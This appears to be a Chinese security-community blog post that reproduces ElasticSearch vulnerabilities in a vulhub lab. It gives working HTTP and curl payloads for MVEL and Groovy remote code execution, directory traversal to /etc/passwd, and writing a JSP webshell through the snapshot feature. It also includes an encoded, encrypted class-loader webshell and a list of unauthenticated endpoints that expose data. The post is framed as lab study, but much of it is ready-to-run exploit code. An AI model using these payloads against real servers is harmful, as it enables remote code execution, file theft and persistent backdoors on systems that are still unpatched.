搜索

ElasticSearch漏洞复现集合

白帽子社区

共 6327字,需浏览 13分钟

 ·

2021-02-18 16:14

作者:巧克力威化饼 编辑:白帽子社区运营团队




    "白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)

"    



简介

ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,如存在相关漏洞,可被攻击者非法操作数据。

基本概念

Elasticsearch是面向文档型数据库,一条数据在这里就是一个文档,用JSON作为文档序列化的格式,比如下面这条用户数据

{    "name" :     "John",    "sex" :      "Male",    "age" :      25,    "birthDate": "1990/05/01",    "about" :    "I love to go rock climbing","interests": [ "sports", "music" ]}



环境搭建

Docker安装 :https://www.runoob.com/docker/centos-docker-install.html
下载vulhub:git clone https://github.com/vulhub/vulhub.git
对靶场进行编译:docker-compose build
运行靶场:docker-compose up -d
关闭镜像:docker-compose down

CVE-2014-3120远程代码执行

原理
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以攻击者可以直接执行任意代码。

MVEL执行命令的代码如下:


import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();



影响版本

v1.1.1

复现

访问环境


该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据


POST /website/blog/ HTTP/1.1Host: yourip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 25
{  "name": "ceshi"}




然后就可以执行任意代码了

POST /_search?pretty HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 343
{    "size": 1,    "query": {      "filtered": {        "query": {          "match_all": {          }        }      }    },    "script_fields": {        "command": {            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"        }    }}



后续反弹shell需要进行编码
编码网址:http://www.jackson-t.ca/runtime-exec-payloads.html


成功得到shell

CVE-2015-1427远程代码执行

原理

CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞既是一个沙盒绕过,也是一个Goovy代码执行漏洞。


复现

访问环境

由于查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据:

POST /website/blog/ HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 25
{  "name": "ceshi"}



然后发送包含payload的数据包,执行任意命令。

POST /_search?pretty HTTP/1.1Host: your-ip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/textContent-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}


通过编码得到反弹shell


CVE-2015-3337目录穿越漏洞

原理

在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。


影响版本

1.4.5以下/1.5.2以下


复现

访问环境


head插件提供了elasticsearch的前端页面,访问 http://your-ip:9200/_plugin/head/ 即可看到
该漏洞插件好像已下架,未找到下载地址

POC:
GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1Host: your-ip:9200Accept:*/*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0Connection: close



CVE-2015-5531目录穿越漏洞

原理

此漏洞利用ES的备份功能,快照本应该是文件,但ES没有对快照是否是文件进行验证,遇到目录就递归读取文件的内容从而导致目录遍历。

影响版本

1.6.1以下

复现

访问环境


使用PUT请求,创建一个仓库

PUT /_snapshot/ceshi HTTP/1.1Host: yourip:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 109
{    "type": "fs",    "settings": {        "location": "/usr/share/elasticsearch/repo/ceshi"    }}



使用同样方法创建一个快照

PUT /_snapshot/ceshi2 HTTP/1.1Host: yourIP:9200Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 126
{    "type": "fs",    "settings": {        "location": "/usr/share/elasticsearch/repo/ceshi/snapshot-backdata"    }}


访问http://yourIP:9200/_snapshot/ceshi/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

可通过google控制台将编码值解码
在控制台输入String.fromCharCode(Unicode 数字编码)  // fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串


Elasticsearch写入webshell漏洞(Wooyun-2015-110216)

原理

ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。
和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。即使管理员配置了该选项,web路径如果不在该目录下,也无法写入webshell。所以该漏洞影响的ElasticSearch版本是1.5.x以前。


影响版本

1.5.x以前


复现

访问环境


开始写入webshell时,首先需要了解网站的绝对路径,创建一个恶意索引文档后,并在终端执行如下命令

curl -XPOST http://ip:9200/yz.jsp/yz.jsp/1 -d'{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'


再创建一个恶意的存储库,其中location的值即为将要写入的路径

curl -XPUT 'http://ip:9200/_snapshot/yz.jsp' -d '{     "type": "fs",     "settings": {          "location": "/usr/local/tomcat/webapps/wwwroot/",          "compress": false     }}'


存储库验证并创建:

curl -XPUT "http://ip:9200/_snapshot/yz.jsp/yz.jsp" -d '{     "indices": "yz.jsp",     "ignore_unavailable": "true",     "include_global_state": false}'


访问http://IP:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp,这就是我们写入的webshell

该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,参数为f,此处的shell要进行部分url编码,不然会连接不成功。
http://192.168.187.136:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%3e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%3e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%3e


未授权访问敏感信息

/_cat/_cat/indices/_plugin/head/ web管理界面/_plugin/sql//_nodes   查看节点数据/_river/_search 查看数据库敏感信息/_search/_search?preety/_status




往期精彩文章




2021年“春秋杯”新年欢乐赛WP
BMZCTF刷题集锦
linux下的凭据窃取
jumpserver RCE复现(附带POC)




技术支持:白帽子社区团队
— 扫码关注我们 



浏览 229
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
Log4J 漏洞复现+漏洞靶场
雷石安全实验室
0
DLL劫持 漏洞复现
小数志
0
[漏洞复现] 二.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
Gcow安全团队
0
[漏洞复现] 三.CVE-2020-0601微软证书漏洞及Windows验证机制欺骗复现
Gcow安全团队
0
OpenSSH命令注入漏洞复现(CVE-2020-15778)
Gcow安全团队
0
手把手教你复现Log4j2漏洞,千万别中招!
Java技术江湖
0
5 分钟复现 log4J 漏洞,手把手实现
未读代码
0
5 分钟复现 log4J 漏洞,手把手实现
互联网全栈架构
0
手把手教你复现Log4j2漏洞,千万别中招!
程序IT圈
0
手把手教你复现 Log4j2 漏洞,千万别中招!
Java技术江湖
0
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报